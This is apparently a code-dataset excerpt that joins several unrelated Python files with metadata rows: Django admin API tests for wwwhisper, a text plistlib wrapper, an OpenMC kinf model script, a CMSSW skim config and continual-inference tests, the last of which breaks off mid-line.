def test_get_not_existing_user(self):
response = self.get('/wwwhisper/admin/api/users/%s/' % FAKE_UUID)
self.assertEqual(404, response.status_code)
self.assertRegexpMatches(response.content, 'User not found')
def test_add_user_invalid_email(self):
response = self.post('/wwwhisper/admin/api/users/',
{'email' : 'foo.bar'})
self.assertEqual(400, response.status_code)
self.assertRegexpMatches(response.content, 'Invalid email format')
def test_add_existing_user(self):
self.add_user()
response = self.post('/wwwhisper/admin/api/users/',
{'email' : TEST_USER_EMAIL})
self.assertEqual(400, response.status_code)
self.assertRegexpMatches(response.content, 'User already exists')
def test_delete_user_twice(self):
user_url = self.add_user()['self']
response = self.delete(user_url)
self.assertEqual(204, response.status_code)
response = self.delete(user_url)
self.assertEqual(404, response.status_code)
self.assertRegexpMatches(response.content, 'User not found')
def test_users_limit(self):
limit = 8
Site.users_limit = limit
for i in range(0, limit):
email = '%s%d' % (TEST_USER_EMAIL, i)
response = self.post('/wwwhisper/admin/api/users/',
{'email' : email})
self.assertEqual(201, response.status_code)
email = '%s%d' % (TEST_USER_EMAIL, limit)
response = self.post('/wwwhisper/admin/api/users/',
{'email' : email})
self.assertEqual(400, response.status_code)
self.assertRegexpMatches(response.content, 'Users limit exceeded')
class LocationTest(AdminViewTestCase):
def test_add_location(self):
response = self.post('/wwwhisper/admin/api/locations/',
{'path' : TEST_LOCATION})
self.assertEqual(201, response.status_code)
parsed_response_body = json.loads(response.content)
location_uuid = extract_uuid(parsed_response_body['id'])
self.assertRegexpMatches(parsed_response_body['id'],
'^urn:uuid:%s$' % uid_regexp())
self.assertEqual(TEST_LOCATION, parsed_response_body['path'])
self.assertTrue('openAccess' not in parsed_response_body)
self_url = '{0}/wwwhisper/admin/api/locations/{1}/'.format(
TEST_SITE, location_uuid)
self.assertEqual(self_url, parsed_response_body['self'])
self.assertEqual(self_url, response['Location'])
self.assertEqual(self_url, response['Content-Location'])
def test_get_location(self):
parsed_add_location_response_body = self.add_location()
get_response = self.get(parsed_add_location_response_body['self'])
self.assertEqual(200, get_response.status_code)
parsed_get_response_body = json.loads(get_response.content)
self.assertEqual(parsed_add_location_response_body,
parsed_get_response_body)
def test_grant_open_access_to_location(self):
location = self.add_location()
self.assertTrue('openAccess' not in location)
open_access_url = location['self'] + 'open-access/'
put_response = self.put(open_access_url)
parsed_response_body = json.loads(put_response.content)
self.assertEqual(201, put_response.status_code)
self.assertEqual(open_access_url, put_response['Location'])
self.assertEqual(open_access_url, parsed_response_body['self'])
# Get location again and make sure openAccess attribute is now true.
location = json.loads(self.get(location['self']).content)
self.assertTrue('openAccess' in location)
def test_grant_open_access_to_location_if_already_granted(self):
location = self.add_location()
open_access_url = location['self'] + 'open-access/'
put_response1 = self.put(open_access_url)
put_response2 = self.put(open_access_url)
self.assertEqual(200, put_response2.status_code)
self.assertFalse(put_response2.has_header('Location'))
self.assertEqual(put_response1.content, put_response2.content)
def test_check_open_access_to_location(self):
location = self.add_location()
open_access_url = location['self'] + 'open-access/'
self.put(open_access_url)
get_response = self.get(open_access_url)
parsed_response_body = json.loads(get_response.content)
self.assertEqual(200, get_response.status_code)
self.assertEqual(open_access_url, parsed_response_body['self'])
def test_revoke_open_access_to_location(self):
location = self.add_location()
open_access_url = location['self'] + 'open-access/'
self.put(open_access_url)
delete_response = self.delete(open_access_url)
self.assertEqual(204, delete_response.status_code)
get_response = self.get(open_access_url)
self.assertEqual(404, get_response.status_code)
def test_revoke_open_access_to_location_if_already_revoked(self):
location = self.add_location()
open_access_url = location['self'] + 'open-access/'
self.put(open_access_url)
self.delete(open_access_url)
delete_response = self.delete(open_access_url)
self.assertEqual(404, delete_response.status_code)
def test_delete_location(self):
location_url = self.add_location()['self']
self.assertEqual(204, self.delete(location_url).status_code)
self.assertEqual(404, self.get(location_url).status_code)
def test_get_locations_list(self):
self.assertEqual(201, self.post('/wwwhisper/admin/api/locations/',
{'path' : '/foo/bar'}).status_code)
self.assertEqual(201, self.post('/wwwhisper/admin/api/locations/',
{'path' : '/baz/bar'}).status_code)
self.assertEqual(201, self.post('/wwwhisper/admin/api/locations/',
{'path' : '/boo/bar/'}).status_code)
response = self.get('/wwwhisper/admin/api/locations/')
self.assertEqual(200, response.status_code)
parsed_response_body = json.loads(response.content)
self.assertEquals('%s/wwwhisper/admin/api/locations/' % TEST_SITE,
parsed_response_body['self'])
locations = parsed_response_body['locations']
self.assertEqual(3, len(locations))
self.assertItemsEqual(['/foo/bar', '/baz/bar', '/boo/bar/'],
[item['path'] for item in locations])
def test_get_not_existing_location(self):
response = self.get('/wwwhisper/admin/api/locations/%s/' % FAKE_UUID)
self.assertEqual(404, response.status_code)
self.assertRegexpMatches(response.content, 'Location not found')
def test_add_location_invalid_path(self):
response = self.post('/wwwhisper/admin/api/locations/',
{'path' : '/foo/../bar'})
self.assertEqual(400, response.status_code)
self.assertRegexpMatches(response.content,
'Path should be absolute and normalized')
def test_add_existing_location(self):
self.add_location()
response = self.post('/wwwhisper/admin/api/locations/',
{'path' : TEST_LOCATION})
self.assertEqual(400, response.status_code)
self.assertRegexpMatches(response.content, 'Location already exists')
def test_delete_location_twice(self):
location_url = self.add_location()['self']
response = self.delete(location_url)
self.assertEqual(204, response.status_code)
response = self.delete(location_url)
self.assertEqual(404, response.status_code)
self.assertRegexpMatches(response.content, 'Location not found')
def test_locations_limit(self):
limit = 7
Site.locations_limit = limit
for i in range(0, limit):
path = '%s%d' % (TEST_LOCATION, i)
response = self.post('/wwwhisper/admin/api/locations/',
{'path' : path})
self.assertEqual(201, response.status_code)
path = '%s%d' % (TEST_LOCATION, limit)
response = self.post('/wwwhisper/admin/api/locations/', {'path' : path})
self.assertEqual(400, response.status_code)
self.assertRegexpMatches(response.content, 'Locations limit exceeded')
class AccessControlTest(AdminViewTestCase):
def can_access(self, location_url, user_uuid):
response = self.get(location_url + 'allowed-users/' + user_uuid + '/')
self.assertTrue(response.status_code == 200
or response.status_code == 404)
return response.status_code == 200
def test_grant_access(self):
location_url = self.add_location()['self']
response = self.add_user()
user_url = response['self']
user_urn = response['id']
user_uuid = extract_uuid(user_urn)
response = self.put(location_url + 'allowed-users/' + user_uuid + '/')
self.assertEqual(201, response.status_code)
parsed_response_body = json.loads(response.content)
resource_url = location_url + 'allowed-users/' + user_uuid + '/'
self.assertEqual(resource_url, response['Location'])
self.assertFalse(response.has_header('Content-Location'))
self.assertEqual(resource_url, parsed_response_body['self'])
self.assertEqual(user_url, parsed_response_body['user']['self'])
self.assertEqual(user_urn, parsed_response_body['user']['id'])
self.assertEqual(TEST_USER_EMAIL, parsed_response_body['user']['email'])
def test_grant_access_creates_allowed_user_resource(self):
location_url = self.add_location()['self']
response = self.add_user()
user_uuid = extract_uuid(response['id'])
self.assertFalse(self.can_access(location_url, user_uuid))
self.put(location_url + 'allowed-users/' + user_uuid + "/")
self.assertTrue(self.can_access(location_url, user_uuid))
def test_revoke_access(self):
location_url = self.add_location()['self']
response = self.add_user()
user_uuid = extract_uuid(response['id'])
# Allow access.
self.put(location_url + 'allowed-users/' + user_uuid + "/")
self.assertTrue(self.can_access(location_url, user_uuid))
# Revoke access.
response = self.delete(
location_url + 'allowed-users/' + user_uuid + "/")
self.assertEqual(204, response.status_code)
self.assertFalse(self.can_access(location_url, user_uuid))
def test_location_lists_allowed_users(self):
location_url = self.add_location()['self']
# Create two users.
user1_urn = self.add_user('user1@acme.com')['id']
user1_uuid = extract_uuid(user1_urn)
user2_urn = self.add_user('user2@acme.com')['id']
user2_uuid = extract_uuid(user2_urn)
self.put(location_url + 'allowed-users/' + user1_uuid + "/")
self.put(location_url + 'allowed-users/' + user2_uuid + "/")
response = self.get(location_url)
parsed_response_body = json.loads(response.content)
allowed_users = parsed_response_body['allowedUsers']
self.assertEqual(2, len(allowed_users))
self.assertItemsEqual(['user1@acme.com', 'user2@acme.com'],
[item['email'] for item in allowed_users])
self.assertItemsEqual([user1_urn, user2_urn],
[item['id'] for item in allowed_users])
def test_grant_access_to_not_existing_location(self):
location_url = '/wwwhisper/admin/api/locations/%s/' % FAKE_UUID
user_uuid = extract_uuid(self.add_user()['id'])
response = self.put(location_url + 'allowed-users/' + user_uuid + '/')
self.assertEqual(404, response.status_code)
self.assertRegexpMatches(response.content, 'Location not found')
def test_grant_access_for_not_existing_user(self):
location_url = self.add_location()['self']
user_uuid = FAKE_UUID
response = self.put(location_url + 'allowed-users/' + user_uuid + '/')
self.assertEqual(404, response.status_code)
self.assertRegexpMatches(response.content, 'User not found')
# PUT should be indempontent, granting access for the second time
# should not return an error.
def test_grant_access_twice(self):
location_url = self.add_location()['self']
response = self.add_user()
user_url = response['self']
user_uuid = extract_uuid(response['id'])
response1 = self.put(location_url + 'allowed-users/' + user_uuid + "/")
self.assertEqual(201, response1.status_code)
self.assertTrue(response1.has_header('Location'))
response2 = self.put(location_url + 'allowed-users/' + user_uuid + "/")
self.assertEqual(200, response2.status_code)
self.assertFalse(response2.has_header('Location'))
self.assertEqual(response1.content, response2.content)
def test_revoke_access_twice(self):
location_url = self.add_location()['self']
response = self.add_user()
user_url = response['self']
user_uuid = extract_uuid(response['id'])
# Allow access.
self.put(location_url + 'allowed-users/' + user_uuid + "/")
self.assertTrue(self.can_access(location_url, user_uuid))
# Revoke access.
response = self.delete(
location_url + 'allowed-users/' + user_uuid + "/")
self.assertEqual(204, response.status_code)
response = self.delete(
location_url + 'allowed-users/' + user_uuid + "/")
self.assertEqual(404, response.status_code)
self.assertRegexpMatches(response.content,
'User can not access location.')
self.assertFalse(self.can_access(location_url, user_uuid))
class AliasTest(AdminViewTestCase):
def test_add_alias(self):
response = self.post('/wwwhisper/admin/api/aliases/',
{'url' : TEST_ALIAS})
self.assertEqual(201, response.status_code)
parsed_response_body = json.loads(response.content)
alias_uuid = extract_uuid(parsed_response_body['id'])
self.assertRegexpMatches(parsed_response_body['id'],
'^urn:uuid:%s$' % uid_regexp())
self.assertEqual(TEST_ALIAS, parsed_response_body['url'])
self_url = '{0}/wwwhisper/admin/api/aliases/{1}/'.format(
TEST_SITE, alias_uuid)
self.assertEqual(self_url, parsed_response_body['self'])
self.assertEqual(self_url, response['Location'])
self.assertEqual(self_url, response['Content-Location'])
def test_get_alias(self):
parsed_post_response_body = self.add_alias()
get_response = self.get(parsed_post_response_body['self'])
self.assertEqual(200, get_response.status_code)
parsed_get_response_body = json.loads(get_response.content)
self.assertEqual(parsed_post_response_body, parsed_get_response_body)
def test_delete_alias(self):
alias_url = self.add_alias()['self']
self.assertEqual(204, self.delete(alias_url).status_code)
self.assertEqual(404, self.get(alias_url).status_code)
def test_get_aliases_list(self):
self.assertEqual(201, self.post('/wwwhisper/admin/api/aliases/',
{'url' : 'http://foo.org'}).status_code)
self.assertEqual(201, self.post('/wwwhisper/admin/api/aliases/',
{'url' : 'http://bar.org'}).status_code)
response = self.get('/wwwhisper/admin/api/aliases/')
self.assertEqual(200, response.status_code)
parsed_response_body = json.loads(response.content)
self.assertEqual('%s/wwwhisper/admin/api/aliases/' % TEST_SITE,
parsed_response_body['self'])
aliases = parsed_response_body['aliases']
# Two created aliases + the original one.
self.assertEqual(3, len(aliases))
self.assertItemsEqual(['http://foo.org', 'http://bar.org',
'https://foo.example.org:8080'],
[item['url'] for item in aliases])
class SkinTest(AdminViewTestCase):
def test_get_skin(self):
response = self.get('/wwwhisper/admin/api/skin/')
self.assertEqual(200, response.status_code)
skin = json.loads(response.content)
self.assertEqual('wwwhisper: Web Access Control', skin['title'])
self.assertEqual('Protected site', skin['header'])
self.assertRegexpMatches(skin['message'], 'Access to this site is')
self.assertTrue(skin['branding'])
def test_put_skin(self):
response = self.put('/wwwhisper/admin/api/skin/',
{'title': 'xyz',
'header': 'foo',
'message': 'bar',
'branding': False})
self.assertEqual(200, response.status_code)
skin = json.loads(response.content)
self.assertEqual('xyz', skin['title'])
self.assertEqual('foo', skin['header'])
self.assertRegexpMatches('bar', skin['message'])
self.assertFalse(skin['branding'])
def test_put_invalid_skin(self):
response = self.put('/wwwhisper/admin/api/skin/',
{'title': 'xyz' * 1000,
'header': '',
'message': '',
'branding': False})
self.assertEqual(400, response.status_code)
self.assertRegexpMatches(response.content,
'Failed to update login page')
| 44.036437 | 80 | 0.635699 |
abe6448fcecf9dc6bfc75f1868f21902baa70a7a | 2,139 | py | Python | text_plistlib/plistlib.py | Artoria2e5/text-plistlib | 5f8c868341bc7e933c8c6e2587dbd75ad0dc93b0 | [
"MIT"
] | null | null | null | text_plistlib/plistlib.py | Artoria2e5/text-plistlib | 5f8c868341bc7e933c8c6e2587dbd75ad0dc93b0 | [
"MIT"
] | null | null | null | text_plistlib/plistlib.py | Artoria2e5/text-plistlib | 5f8c868341bc7e933c8c6e2587dbd75ad0dc93b0 | [
"MIT"
] | null | null | null | """
Wrapper providing a plistlib interface. Better than a patch?
"""
__all__ = [
"InvalidFileException",
"FMT_XML",
"FMT_BINARY",
"FMT_TEXT",
"load",
"dump",
"loads",
"dumps",
"UID",
]
import plistlib as pl
from enum import Enum
from io import BytesIO
from typing import BinaryIO
from .impl import FMT_TEXT_HANDLER, TextPlistTypes
UID = pl.UID
InvalidFileException = pl.InvalidFileException
PF = Enum("TextPlistFormat", "FMT_XML FMT_BINARY FMT_TEXT", module=__name__)
globals().update(PF.__members__)
translation = {
PF.FMT_XML: pl.FMT_XML,
PF.FMT_BINARY: pl.FMT_BINARY,
}
def load(fp: BinaryIO, *, fmt=None, **kwargs) -> TextPlistTypes:
"""Read a .plist file (forwarding all arguments)."""
if fmt is None:
header = fp.read(32)
fp.seek(0)
if FMT_TEXT_HANDLER["detect"](header):
fmt = PF.FMT_TEXT
if fmt == PF.FMT_TEXT:
return FMT_TEXT_HANDLER["parser"](**kwargs).parse(fp)
else:
# This one can fail a bit more violently like the original
return pl.load(fp, fmt=translation[fmt], **kwargs)
def loads(value: bytes, **kwargs) -> TextPlistTypes:
"""
Read a .plist file from a bytes object.
>>> loads(b'{4=1;}', fmt=FMT_TEXT)
{'4': '1'}
"""
return load(BytesIO(value), **kwargs)
def dump(value: TextPlistTypes, fp, *, fmt=PF.FMT_TEXT, **kwargs):
if fmt == PF.FMT_TEXT:
writer = FMT_TEXT_HANDLER["writer"](fp, **kwargs)
writer.write(value)
else:
# ignore type -- let the real plistlib complain about None :)
return pl.dump(value, fp, fmt=translation.get(fmt), **kwargs) # type: ignore
def dumps(value: TextPlistTypes, **kwargs) -> bytes:
"""
>>> dumps({ "1": [2,3,4,None,5] })
b'{\n\t"1" = (\n\t\t<*I2>,\n\t\t<*I3>,\n\t\t<*I4>,\n\t\t"",\n\t\t<*I5>,\n\t);\n}'
"""
fp = BytesIO()
dump(value, fp, **kwargs)
return fp.getvalue()
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
print(dumps(eval(sys.argv[1])))
| 25.771084 | 86 | 0.586255 |
abe683c77717a86c75c2669b78ad1d9d8749390b | 3,992 | py | Python | treat/moc/kinf/make_kinf.py | tjlaboss/tasty_treat | 5a137b49c6648eda6500025de8bab9c8dcc78d45 | [
"MIT"
] | 3 | 2019-03-04T22:52:07.000Z | 2022-01-23T12:28:58.000Z | treat/moc/kinf/make_kinf.py | tjlaboss/tasty_treat | 5a137b49c6648eda6500025de8bab9c8dcc78d45 | [
"MIT"
] | 3 | 2021-07-23T17:30:35.000Z | 2021-09-17T16:25:57.000Z | treat/moc/kinf/make_kinf.py | tjlaboss/tasty_treat | 5a137b49c6648eda6500025de8bab9c8dcc78d45 | [
"MIT"
] | null | null | null | # Make kinf
#
# Analyze the fuel materials from different libraries
import numpy as np
import openmc
from openmc import mgxs
import os
import sys; sys.path.append("..")
import materials
import energy_groups
def _get_fuel(library):
try:
fuel = library.get_material("fuel")
except KeyError:
fuel = library.get_material("fuel 7.6 ppm")
return fuel
def get_geometry(fuel):
root_cell = openmc.Cell(name="root cell")
root_cell.fill = fuel
w = openmc.XPlane(x0=-10, boundary_type="periodic")
e = openmc.XPlane(x0=+10, boundary_type="periodic")
s = openmc.YPlane(y0=-10, boundary_type="periodic")
n = openmc.YPlane(y0=+10, boundary_type="periodic")
b = openmc.ZPlane(z0=-10, boundary_type="periodic")
t = openmc.ZPlane(z0=+10, boundary_type="periodic")
root_cell.region = +w & -e & +s & -n & +b & -t
root_universe = openmc.Universe(0, "root universe", [root_cell])
g = openmc.Geometry()
g.root_universe = root_universe
return g
def get_materials(library):
openmc_mats = library.toOpenmcMaterials()
return openmc_mats
def get_settings():
s = openmc.Settings()
s.particles = int(1E6)
s.batches = 100
s.inactive = 25
return s
def _mgxs_groups(groups, geom, fuel, by_nuclide=False):
material_libraries = {}
for g in groups:
assert g in energy_groups.ALL_GROUP_NUMBERS
if g == 11:
eg = energy_groups.treat["11-group"]
else:
key = "{}-group".format(g)
eg = energy_groups.casmo[key]
eg.group_edges *= 1E6
lib = mgxs.Library(geom)
lib.energy_groups = eg
lib.mgxs_types = ['nu-transport', 'transport', 'total', 'fission',
'nu-fission', 'capture', 'chi', 'consistent nu-scatter matrix']
lib.correction = "P0"
lib.by_nuclide = by_nuclide
lib.domain_type = "material"
lib.domains = [fuel]
lib.build_library()
material_libraries[g] = lib
return material_libraries
def get_tallies(fuel, libraries=None):
tallies = openmc.Tallies()
tal1 = openmc.Tally()
tal1.scores = ["absorption"]
nucs = list(np.array(fuel.nuclides)[:,0])
tal1.nuclides = nucs
tallies.extend([tal1])
if libraries is not None:
for lib in libraries.values():
lib.add_to_tallies_file(tallies)
return tallies
def export_to_xml(export_path, s, g, m, t=None, l=None):
assert isinstance(s, openmc.Settings)
assert isinstance(g, openmc.Geometry)
assert isinstance(m, openmc.Materials)
if t is not None:
assert isinstance(t, openmc.Tallies)
t.export_to_xml(export_path + "/tallies.xml")
if l is not None:
for lib in l.values():
fname = "material_lib_{}".format(lib.num_groups)
lib.dump_to_file(fname, directory=export_path)
s.export_to_xml(export_path + "/settings.xml")
g.export_to_xml(export_path + "/geometry.xml")
m.export_to_xml(export_path + "/materials.xml")
def build_model(lib, multigroup):
matlib = materials.get_library(lib)
if not os.path.isdir(lib):
# Standard PermissionError is exactly what we want
os.mkdir(lib)
print("Exporting to:", lib)
fuel = _get_fuel(matlib)
# replace natural elements to nuclides
# Note: I think this can be done with "fuel.get_nuclide_densities()"
all_elements = fuel.elements[:]
for el in all_elements:
elem, etype, efrac = el[0:3]
for nuc, nfrac, ntype in elem.expand(etype, efrac):
fuel.add_nuclide(nuc, nfrac, ntype)
fuel.remove_element(elem)
mats = get_materials(matlib)
sets = get_settings()
geom = get_geometry(fuel)
libs = _mgxs_groups(multigroup, geom, fuel)
tals = get_tallies(fuel, libs)
export_to_xml(lib, sets, geom, mats, tals, libs)
# Extract the nuclide number densities
fuel_atoms = fuel.get_nuclide_atom_densities()
nuclide_results = np.array(list(fuel_atoms.values()))
nuclides = np.array([n.name for n in nuclide_results[:, 0]])
np.savetxt(lib + "/nuclides.txt", nuclides, fmt='%s')
atom_dens = nuclide_results[:, 1]
np.savetxt(lib + "/atom_dens.txt", atom_dens)
atom_frac = atom_dens / atom_dens.sum()
np.savetxt(lib + "/atom_frac.txt", atom_frac)
if __name__ == "__main__":
build_model("BATMAN", multigroup=[11, 25])
| 29.352941 | 75 | 0.717435 |
abe704d6ccddf0e4852958c0661a8661be5aca37 | 1,775 | py | Python | Configuration/Skimming/test/tier1_hi/hiHighPt_PromptSkim2011_cfg.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | Configuration/Skimming/test/tier1_hi/hiHighPt_PromptSkim2011_cfg.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | Configuration/Skimming/test/tier1_hi/hiHighPt_PromptSkim2011_cfg.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
process = cms.Process("HIGHPTSKIM")
process.load('Configuration.StandardSequences.Services_cff')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContentHeavyIons_cff')
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'file:/mnt/hadoop/cms/store/hidata/HIRun2010/HIAllPhysics/RECO/SDmaker_3SD_1CS_PDHIAllPhysicsZSv2_SD_JetHI-v1/0000/A8934EC1-904B-E011-862C-003048F17528.root'
)
)
# =============== Other Statements =====================
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(-1))
process.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))
#Trigger Selection
### Comment out for the timing being assuming running on secondary dataset with trigger bit selected already
import HLTrigger.HLTfilters.hltHighLevel_cfi
process.hltHIHighPt = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()
process.hltHIHighPt.HLTPaths = ['HLT_HIDoublePhoton15_*','HLT_HIJet80_*','HLT_HISinglePhoton40_*'] # for allphysics
process.hltHIHighPt.andOr = cms.bool(True)
process.hltHIHighPt.throw = cms.bool(False)
process.eventFilter_step = cms.Path( process.hltHIHighPt )
process.output = cms.OutputModule("PoolOutputModule",
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('hiHighPt.root'),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('eventFilter_step')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('hiHighPt'))
)
process.output_step = cms.EndPath(process.output)
process.schedule = cms.Schedule(
process.eventFilter_step,
process.output_step
)
| 41.27907 | 165 | 0.774085 |
abe9baf8318a46fc0311d26e659c7ccdb9f8b58b | 162 | py | Python | util/time.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 4 | 2016-12-17T20:06:10.000Z | 2021-11-19T04:45:29.000Z | util/time.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 11 | 2021-01-06T05:35:11.000Z | 2022-03-11T23:28:31.000Z | util/time.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 3 | 2015-06-12T10:44:16.000Z | 2021-07-26T18:39:47.000Z | from warnings import warn
warn('Deprecated: Moved to ut.util.utime (to avoid name conflict with standard lib `time`)')
from ut.util.utime import * # move here
| 27 | 92 | 0.746914 |
abea45b584c7c99d2b9324078e8fed24a7f61377 | 369 | py | Python | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | """Runs when the `poop` alias has not been setup."""
from colorama import init
from ..utils import colored
from .alias import is_configured
from .alias import configure
init()
def main():
if not is_configured():
configure()
print(colored('The `poop` alias was configured successfully.\n'
'Run `source ~/.bashrc` or restart your shell.'))
| 21.705882 | 67 | 0.682927 |
abed9d35fcc34be316a0a17409f3f6ae90788595 | 443 | py | Python | src/biking/migrations/0002_auto_20170312_1532.py | AlexDevelop/seen-movies | 95d83d3271258feb5c55544de1078f467c569bc5 | [
"MIT"
] | null | null | null | src/biking/migrations/0002_auto_20170312_1532.py | AlexDevelop/seen-movies | 95d83d3271258feb5c55544de1078f467c569bc5 | [
"MIT"
] | null | null | null | src/biking/migrations/0002_auto_20170312_1532.py | AlexDevelop/seen-movies | 95d83d3271258feb5c55544de1078f467c569bc5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-12 15:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('biking', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='bikeride',
name='ride_avg_km',
field=models.FloatField(null=True),
),
]
| 21.095238 | 48 | 0.609481 |
abedb7b5e1c8f300b4bf64a7a429b96267ce296d | 210 | py | Python | coding/learn_python/function_object/reduce_mul_demo.py | yatao91/learning_road | e88dc43de98e35922bfc71c222ec71766851e618 | [
"MIT"
] | 3 | 2021-05-25T16:58:52.000Z | 2022-02-05T09:37:17.000Z | coding/learn_python/function_object/reduce_mul_demo.py | yataosu/learning_road | e88dc43de98e35922bfc71c222ec71766851e618 | [
"MIT"
] | null | null | null | coding/learn_python/function_object/reduce_mul_demo.py | yataosu/learning_road | e88dc43de98e35922bfc71c222ec71766851e618 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
from functools import reduce
from operator import mul
def fact_lambda(n):
return reduce(lambda a, b: a * b, range(1, n+1))
def fact_mul(n):
return reduce(mul, range(1, n+1))
| 17.5 | 52 | 0.647619 |
abf5a5efa1eec3c81e55b4c7175e48f263de13b1 | 16,929 | py | Python | tests/continual/test_container.py | LukasHedegaard/continual-inference | 99a01f1360c56e2578231edd8fecb0dbadbf44d0 | [
"Apache-2.0"
] | 7 | 2021-09-22T14:42:59.000Z | 2022-03-28T20:43:25.000Z | tests/continual/test_container.py | LukasHedegaard/continual-inference | 99a01f1360c56e2578231edd8fecb0dbadbf44d0 | [
"Apache-2.0"
] | 29 | 2021-08-11T06:58:21.000Z | 2022-03-29T07:19:37.000Z | tests/continual/test_container.py | LukasHedegaard/continual-inference | 99a01f1360c56e2578231edd8fecb0dbadbf44d0 | [
"Apache-2.0"
] | 2 | 2021-10-03T20:03:09.000Z | 2021-12-03T17:31:48.000Z | import math
from collections import OrderedDict
import pytest
import torch
from torch import nn
import continual as co
from continual.module import TensorPlaceholder
torch.manual_seed(42)
def test_sequential():
S = 3
long_example_clip = torch.normal(mean=torch.zeros(10 * 3 * 3)).reshape(
(1, 1, 10, 3, 3)
)
seq = nn.Sequential(
nn.Conv3d(
in_channels=1,
out_channels=1,
kernel_size=(5, S, S),
bias=True,
padding=(0, 1, 1),
padding_mode="zeros",
),
nn.Conv3d(
in_channels=1,
out_channels=1,
kernel_size=(3, S, S),
bias=True,
padding=(0, 1, 1),
padding_mode="zeros",
),
nn.MaxPool3d(kernel_size=(1, 2, 2)),
)
coseq = co.Sequential.build_from(seq)
assert coseq.delay == (5 - 1) + (3 - 1)
# forward
output = seq.forward(long_example_clip)
co_output = coseq.forward(long_example_clip)
assert torch.allclose(output, co_output)
# forward_steps
co_output_firsts_0 = coseq.forward_steps(
long_example_clip[:, :, :-1], update_state=False
)
co_output_firsts = coseq.forward_steps(long_example_clip[:, :, :-1])
assert torch.allclose(co_output_firsts, co_output_firsts_0)
assert torch.allclose(co_output_firsts, output[:, :, :-1])
# forward_step
co_output_last_0 = coseq.forward_step(
long_example_clip[:, :, -1], update_state=False
)
co_output_last = coseq.forward_step(long_example_clip[:, :, -1])
assert torch.allclose(co_output_last, co_output_last_0)
assert torch.allclose(co_output_last, output[:, :, -1])
# Clean state can be used to restart seq computation
coseq.clean_state()
co_output_firsts = coseq.forward_steps(long_example_clip[:, :, :-1])
assert torch.allclose(co_output_firsts, output[:, :, :-1])
def test_sequential_receptive_field():
sample = torch.randn((1, 1, 100))
# No padding, stride 1
net = co.Sequential(*[co.Conv1d(1, 1, 9) for _ in range(10)])
assert net.receptive_field == 9 + 8 * 9
output = net.forward(sample)
assert output.shape[2] == 100 - (net.receptive_field - 1)
# Padding, stride 1
net = co.Sequential(*[co.Conv1d(1, 1, 9, padding=4) for _ in range(10)])
assert net.receptive_field == 9 + 8 * 9
output = net.forward(sample)
assert output.shape[2] == 100 - (net.receptive_field - 1) + 2 * net.padding
# No padding, mixed stride
net = co.Sequential(
co.Conv1d(1, 1, 3, padding=0, stride=1),
co.Conv1d(1, 1, 3, padding=0, stride=2),
co.Conv1d(1, 1, 3, padding=0, stride=3),
co.Conv1d(1, 1, 3, padding=0, stride=1),
)
assert net.receptive_field == 21
output = net.forward(sample)
assert output.shape[2] == math.ceil((100 - (net.receptive_field - 1)) / net.stride)
# Padding, mixed stride
net = co.Sequential(
co.Conv1d(1, 1, 3, padding=1, stride=1),
co.Conv1d(1, 1, 3, padding=1, stride=2),
co.Conv1d(1, 1, 3, padding=1, stride=3),
co.Conv1d(1, 1, 3, padding=1, stride=1),
)
assert net.receptive_field == 21
output = net.forward(sample)
assert net.padding == 1 + 1 + 2 + 2 * 3
assert output.shape[2] == math.ceil(
(100 - (net.receptive_field - 1) + 2 * net.padding) / net.stride
)
def test_sequential_with_TensorPlaceholder():
sample = torch.arange(32, dtype=torch.float).reshape((1, 1, 32))
seq = nn.Sequential(
nn.Conv1d(
in_channels=1,
out_channels=1,
kernel_size=3,
bias=False,
padding=1,
padding_mode="zeros",
),
nn.MaxPool1d(
kernel_size=2,
stride=2, # Has temporal skips
padding=0,
),
nn.Conv1d(
in_channels=1,
out_channels=1,
kernel_size=3,
bias=False,
stride=2, # Has temporal skips
padding=1,
padding_mode="zeros",
),
)
torch.nn.init.ones_(seq[0].weight)
torch.nn.init.ones_(seq[2].weight)
coseq = co.Sequential.build_from(seq)
assert coseq.stride == 4
assert coseq.padding == 3
assert coseq.receptive_field == 8
assert coseq.delay == 4
target = seq.forward(sample)
# forward_steps with padding
output = coseq.forward_steps(sample, pad_end=True)
assert torch.allclose(target, output)
coseq.clean_state()
out_stepwise = []
for i in range(sample.shape[2]):
out_stepwise.append(coseq.forward_step(sample[:, :, i]))
out_cleaned = torch.stack(
